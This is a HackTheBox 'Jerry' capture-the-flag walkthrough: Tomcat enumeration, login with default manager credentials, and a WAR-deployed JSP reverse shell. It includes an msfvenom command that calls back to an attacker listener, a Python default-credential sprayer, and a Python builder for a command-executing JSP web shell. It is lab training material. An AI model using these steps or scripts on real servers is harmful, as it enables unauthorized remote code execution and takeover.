HackTheBox Jerry Writeup
Enjoy reading my HTB Jerry Writeup
Information Gathering
Let's start with an nmap scan to learn which services are running on the HTB Jerry machine.
sudo nmap -p- -T4 -sC -sV -O -v 10.10.10.95
The operating system appears to be Windows Server 2012, with Apache Tomcat (Coyote HTTP connector) listening on port 8080.
Browsing to the site shows the default Apache Tomcat/7.0.88 page. Let's keep that version in mind, as we may need to search for matching exploits later, but first I will enumerate directories and files.
gobuster dir -u http://10.10.10.95:8080/ -x php -w /Lists/directory-small.txt
Gobuster found three directories:
- /docs
- /examples
- /manager
They all belong to the default installation, and /manager requires login credentials we do not have.
Clicking "Cancel" on the basic-auth prompt returns Tomcat's 401 Unauthorized page, which explains how to set up a manager user and includes an example tomcat-users.xml entry with the credentials tomcat:s3cret.
Once again, the web admin was pretty lazy: these example credentials actually work.
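The check above can be scripted so it is repeatable on the next Tomcat host. The script below is an added example, not part of the original writeup: it tries the example pair from Tomcat's 401 page plus a few other common defaults (my own list, an assumption) against /manager/html and classifies the response. The one caveat worth knowing is that Tomcat authenticates before it authorises, so a 403 means the username and password are correct but the account lacks the manager-gui role, which is still useful information.

```python
"""Probe a Tomcat manager for the example credentials shipped in its 401 page.

Added example, not from the original writeup. The target URL is the Jerry
box; the credential list is an assumption (Tomcat's documented example pair
plus common defaults).
"""
import base64
import urllib.error
import urllib.request

# tomcat:s3cret is the example entry Tomcat's own 401 page prints; the rest are
# common defaults (constructed list, an assumption).
CANDIDATES = [
    ("tomcat", "s3cret"),
    ("tomcat", "tomcat"),
    ("admin", "admin"),
    ("admin", ""),
]


def basic_auth_header(user: str, password: str) -> str:
    """Build the HTTP Basic Authorization header value (RFC 7617)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def classify(status: int) -> str:
    """Map a /manager/html status code to what it says about the credential.

    401: rejected (wrong username/password)
    403: accepted, but the account lacks the manager-gui role; Tomcat
         authenticates before it authorises, so this still leaks a valid login
    200: accepted and authorised for the manager application
    """
    return {401: "invalid", 403: "valid-no-role", 200: "valid"}.get(
        status, f"other({status})"
    )


def probe(url: str, user: str, password: str, timeout: float = 5.0) -> str:
    """Send one authenticated GET and return the classification."""
    req = urllib.request.Request(
        url, headers={"Authorization": basic_auth_header(user, password)}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status)
    except urllib.error.HTTPError as exc:
        return classify(exc.code)


if __name__ == "__main__":
    target = "http://10.10.10.95:8080/manager/html"
    for user, password in CANDIDATES:
        result = probe(target, user, password)
        print(f"{user}:{password!r:<10} -> {result}")
        if result == "valid":
            break
```

Stop at the first "valid" result and log any "valid-no-role" hits separately; the same account may still work against /manager/text or /host-manager if it holds a different role.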
Gaining a reverse shell
After logging into the manager panel we can deploy a WAR file. Luckily, msfvenom can create payloads in the WAR format using the following command:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.180 LPORT=4545 -f war > shell.war
which we then can upload using the deploy function on the website.
Next, fire up Metasploit and select the handler with use exploit/multi/handler, then set LHOST and LPORT to match the msfvenom command and set the payload to java/jsp_shell_reverse_tcp.
Once that is set up, browse to http://10.10.10.95:8080/shell/ and the deployed JSP will connect back, giving us a reverse shell session in msf.
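To show what msfvenom actually hands to the manager, here is an added example (not the writeup's or Metasploit's code) that packages a JSP into a WAR with the same layout: a WEB-INF/web.xml descriptor and the JSP at the archive root. Instead of a reverse shell, the JSP only runs whoami and echoes the output, which is enough to confirm the account Tomcat runs under before deploying anything noisier. The archive and page names are my own choices (assumptions).

```python
"""Package a JSP into a deployable WAR by hand, mirroring msfvenom -f war.

Added example, not from the original writeup. Upload the resulting file through
the manager's deploy form; Tomcat uses the archive name as the context path.
"""
import io
import zipfile

# Minimal deployment descriptor, included to match the layout msfvenom produces.
# The JSP is found by path, so no servlet mapping is needed.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
</web-app>
"""

# Runs a fixed command and writes its stdout into the HTTP response.
# On Windows this prints the Tomcat service account (e.g. nt authority\\system).
WHOAMI_JSP = """<%@ page import="java.io.*" %>
<%
    Process p = Runtime.getRuntime().exec("whoami");
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
%>
"""


def build_war(jsp_name: str, jsp_source: str) -> bytes:
    """Return the bytes of a WAR containing WEB-INF/web.xml and one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def list_war(war_bytes: bytes) -> list[str]:
    """Sorted entry names of a WAR, for checking what was packaged."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def read_entry(war_bytes: bytes, name: str) -> str:
    """Read one text entry back out of the archive."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.read(name).decode()


if __name__ == "__main__":
    data = build_war("whoami.jsp", WHOAMI_JSP)
    with open("whoami.war", "wb") as fh:
        fh.write(data)
    print(f"wrote whoami.war ({len(data)} bytes): {list_war(data)}")
    # After deploying whoami.war via the manager, request
    # http://10.10.10.95:8080/whoami/whoami.jsp to see the account name.
```

Because the manager deploys the archive under a context named after the file, a WAR called whoami.war serves its JSP at /whoami/whoami.jsp; msfvenom's shell.war behaves the same way, which is why requesting /shell/ triggers the payload.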
As the shell already runs as NT AUTHORITY\SYSTEM, we navigate straight to C:\Users\Administrator\Desktop\flags without any further privilege escalation.
Use type "2 for the price of 1.txt" to display both the user and the root flag.
Tags:
HTB, hackthebox, jerry, windows, apache, tomcat